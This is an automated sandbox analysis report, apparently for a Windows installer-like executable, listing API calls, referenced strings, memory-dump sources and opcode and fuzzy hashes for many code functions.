• String ID: TWindowDisabler-Window
• API String ID: 716092398-1824977358
• Opcode ID: 4c523ab884bdc3a49de6328adf8e7a054ac0ed32c9ba937a131d341f4e2fdf35
• Instruction ID: 2ae43f73961e2cef950b8e695cbe18b859b25492b357a47972b29cef978d1eeb
• Opcode Fuzzy Hash: 4c523ab884bdc3a49de6328adf8e7a054ac0ed32c9ba937a131d341f4e2fdf35
• Instruction Fuzzy Hash: BAF092B2604158BF9B80DE9DEC81EDB77ECEB4D2A4B05416AFA0CD3201D634ED118BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005C6790: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B69F6,?,006AAD36,00000000,006AAF8E,?,00000000,00000000), ref: 006AAB1D
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 006AAAEF
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: da8735f4dc006e90bb9b8b986ea425c324a21ddcfd42a3c6304858d0bd78099f
• Instruction ID: ff1a3d223dd7ccb396a2362d893f6dffa0b2018229c4d4fe2cb2bd772e9b64c8
• Opcode Fuzzy Hash: da8735f4dc006e90bb9b8b986ea425c324a21ddcfd42a3c6304858d0bd78099f
• Instruction Fuzzy Hash: 9CF0A7313002146BEA14B5DEAC86BAEA7DEDFC5754F20007FF608D7341DAA5AE018776
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindNextFileW.KERNEL32(000000FF,?,00000000,0060D852,?,00000000,0060D8C6,?,?,?,006AB575,00000000,006AB4C4,00000000,00000000,00000001), ref: 0060D82E
• FindClose.KERNEL32(000000FF,0060D859,0060D852,?,00000000,0060D8C6,?,?,?,006AB575,00000000,006AB4C4,00000000,00000000,00000001,00000001), ref: 0060D84C
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: d48f2cbf2b9092f2daa8eb9adf7c3c818559f109f1d30e0a18f1e29d2656c723
• Instruction ID: 1c78dce3c56f1043e552bdc12dc5b32a6e7837210c4168244b7acddc60a03fe0
• Opcode Fuzzy Hash: d48f2cbf2b9092f2daa8eb9adf7c3c818559f109f1d30e0a18f1e29d2656c723
• Instruction Fuzzy Hash: 99818E30D442899EDF15DFA5C885BEEBBB6AF05304F1482AAE858732C1C7349F85CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005CD18C: GetDC.USER32(00000000), ref: 005CD19D
  • Part of subcall function 005CD18C: SelectObject.GDI32(0068C9D4,00000000), ref: 005CD1BF
  • Part of subcall function 005CD18C: GetTextExtentPointW.GDI32(0068C9D4,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CD1D3
  • Part of subcall function 005CD18C: GetTextMetricsW.GDI32(0068C9D4,?,00000000,005CD218,?,00000000,?,?,0068C9D4), ref: 005CD1F5
  • Part of subcall function 005CD18C: ReleaseDC.USER32 ref: 005CD212
• MulDiv.KERNEL32(0068D3C3,00000006,00000006), ref: 005CFA61
• MulDiv.KERNEL32(?,?,0000000D), ref: 005CFA78
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Text$ExtentMetricsObjectPointReleaseSelect
• String ID:
• API String ID: 844173074-0
• Opcode ID: fd25a673d468ed6fabf3aa3adbc59892d19b3712dbcf1daa220eafedc1c648fb
• Instruction ID: ab832f5469577de02f6ead1a3026336d1fcba8013a7d9bcb612a7bf876de2192
• Opcode Fuzzy Hash: fd25a673d468ed6fabf3aa3adbc59892d19b3712dbcf1daa220eafedc1c648fb
• Instruction Fuzzy Hash: D841F835A00109EFCB04DBA8D985EADB7F9FB49314F2541A9F808EB361D771AE41DB50
Uniqueness

Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410FA3
                                                                                    • LocalFree.KERNEL32(00000000,00000000), ref: 00410FBD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Free$LibraryLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3007483513-0
                                                                                    • Opcode ID: 2c56d0444da96fb36466aa933463bccba2c3bdcbce3cca605f17c6cf2350efff
                                                                                    • Instruction ID: 8866b8cac1c51f9e5027aba2395861c2b17d45cfec343fd2db600496dc988245
                                                                                    • Opcode Fuzzy Hash: 2c56d0444da96fb36466aa933463bccba2c3bdcbce3cca605f17c6cf2350efff
                                                                                    • Instruction Fuzzy Hash: DC318371D00105AB8B24DF96D5829FFB7B9AF88314B15811EFA0497351DBB8DDC1CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    • Opcode ID: e8cd89fe78807f8a59e4ef6fd92fca2d24216d165143f74ece7b225ae6d9bccb
                                                                                    • Instruction ID: 67efb5fed51bc053756b647ddfd8e6ea43793a5abe40bf12c6ea97a73f2c0f5a
                                                                                    • Opcode Fuzzy Hash: e8cd89fe78807f8a59e4ef6fd92fca2d24216d165143f74ece7b225ae6d9bccb
                                                                                    • Instruction Fuzzy Hash: AF312F70A002199FDB10EB9AC882BAEB7B5EF48308F50497BE400B33D1D7789D558B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00414083
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                                                    • Instruction ID: b41df1fa75d381eed13266955d9feb05bf3a80cdd3b44aa66b38c7297c5ee5d6
                                                                                    • Opcode Fuzzy Hash: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                                                    • Instruction Fuzzy Hash: 3C11C631604208AFD701DF22CC529AD7BECEB8E714BA2047AF904E3680DB385F549599
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                    • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                                                    • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                    • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                                                    • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Thread$CurrentEnumWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2396873506-0
                                                                                    • Opcode ID: 2500ecb8bc62876c8ff2405f47f095ea4bb89944262ada6799aa535262b27f39
                                                                                    • Instruction ID: 4b564e7848d778c1821dbee75f023e1981a666a926d985b7d896297b812e440b
                                                                                    • Opcode Fuzzy Hash: 2500ecb8bc62876c8ff2405f47f095ea4bb89944262ada6799aa535262b27f39
                                                                                    • Instruction Fuzzy Hash: 93112574A08744AFD711CF26DC92D6ABFE9E74A710F11A4AAE800D3795EB756C00CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,0060BB15,?,?,?), ref: 0060BAEF
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0060BB15,?,?,?), ref: 0060BAF7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2018770650-0
                                                                                    • Opcode ID: 3ac4022b0d504f8d56561d974b577821acbd762e4ecd66f76f585f39e4d74a53
                                                                                    • Instruction ID: 78568c7df48a63312c1550ac91009127c3edb94fe6ea848b53d264e1db3dc997
                                                                                    • Opcode Fuzzy Hash: 3ac4022b0d504f8d56561d974b577821acbd762e4ecd66f76f585f39e4d74a53
                                                                                    • Instruction Fuzzy Hash: 89F0C831B44308ABCB15DFB5AC014AFB7EDDB49310B5189B6F804E3281EB755E005694
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C021,?,?,00000000), ref: 0060BFFB
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0060C021,?,?,00000000), ref: 0060C003
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DirectoryErrorLastRemove
                                                                                    • String ID:
                                                                                    • API String ID: 377330604-0
                                                                                    • Opcode ID: 4f11924e44832b53a48258f3fad39eddf14758d76f0ec3ccb02dc41b6ad7c7d0
                                                                                    • Instruction ID: d83f262ecc697e56b821021d063cc9f2e957c9b8bafe74f0302a089c4b99f6ee
                                                                                    • Opcode Fuzzy Hash: 4f11924e44832b53a48258f3fad39eddf14758d76f0ec3ccb02dc41b6ad7c7d0
                                                                                    • Instruction Fuzzy Hash: 28F0C231A44208ABCB04DFB5AC418AFB3EDDB493207518ABAF804E3281EB355E009698
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,0060BCEF,?,?), ref: 0060BCC9
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0060BCEF,?,?), ref: 0060BCD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1799206407-0
                                                                                    • Opcode ID: 1c121fbd5665a0096efe5b84419c7e24b5e8f66e2a1324fde6f8faf8d5c18489
                                                                                    • Instruction ID: 077669ac207cf36a01174a2dc4ca6ad55a817ede354f0dc89a67c00d07fb0518
                                                                                    • Opcode Fuzzy Hash: 1c121fbd5665a0096efe5b84419c7e24b5e8f66e2a1324fde6f8faf8d5c18489
                                                                                    • Instruction Fuzzy Hash: 74F02830E847089BDB04DF759C0189EB3A9EB0532075187BAF814933C1EB345E008688
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000,00000000), ref: 0042B84A
                                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,0042B894,?,00000000,0042B8B2,?,00008000,00000000), ref: 0042B879
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC7F4,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAE8F
                                                                                    • CoTaskMemFree.OLE32(?,006AAED2,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEC5
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC804,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEE2
                                                                                    • CoTaskMemFree.OLE32(?,006AAF25,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAF18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 969438705-544719455
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC804,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEE2
                                                                                    • CoTaskMemFree.OLE32(?,006AAF25,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAF18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 969438705-544719455
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(00000000,000000FC), ref: 004786AB
                                                                                    • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,00614EFE,006B75B7,?,?,?,?,006B8087), ref: 004786B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyLong
                                                                                    • String ID:
                                                                                    • API String ID: 2871862000-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C4000,006D0B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D44,00469959,00000000,00469A44,?,?,00443D44), ref: 0042373D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CAC2A,00000000,005CAC7B,?,005CAE5C), ref: 005C7317
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005C55CA,?,00000000,00000000,?,005C561A,00000000,0060BBD5,00000000,0060BBF6,?,00000000,00000000,00000000), ref: 005C55AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: e93b562a759e66bd38da0de11055e6c017c6201b016aab2ebf39318819426300
                                                                                    • Instruction ID: a8011987c62d8bbf1b65cfa24b3062553c79dfa79d40fcaab4f28f3b38eec933
                                                                                    • Opcode Fuzzy Hash: e93b562a759e66bd38da0de11055e6c017c6201b016aab2ebf39318819426300
                                                                                    • Instruction Fuzzy Hash: 19E09231344704AFD701EAF2CC92E5DBBADE749700BA108B9F400E7641E678AE408558
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                                                      • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                      • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                    • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                                                    • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                    • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,?,0060BE09,00000000,0060BE22,?,?,00000000), ref: 005C562B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: d03a573201fb9b0cdfea091783fb35ce32931a896a6b2078e9e32ab2ad42dd54
                                                                                    • Instruction ID: 1dd340722b5d2e1c7f6fd742ac5f6a0627fbc3f81dbe6857a6f1813bcaa5320a
                                                                                    • Opcode Fuzzy Hash: d03a573201fb9b0cdfea091783fb35ce32931a896a6b2078e9e32ab2ad42dd54
                                                                                    • Instruction Fuzzy Hash: 49D080A0241A000DDE2499FD0CCDF5905845F45775FA41B6EFB64D11E2F739ECD31028
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005CC453,00000000), ref: 005C55E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
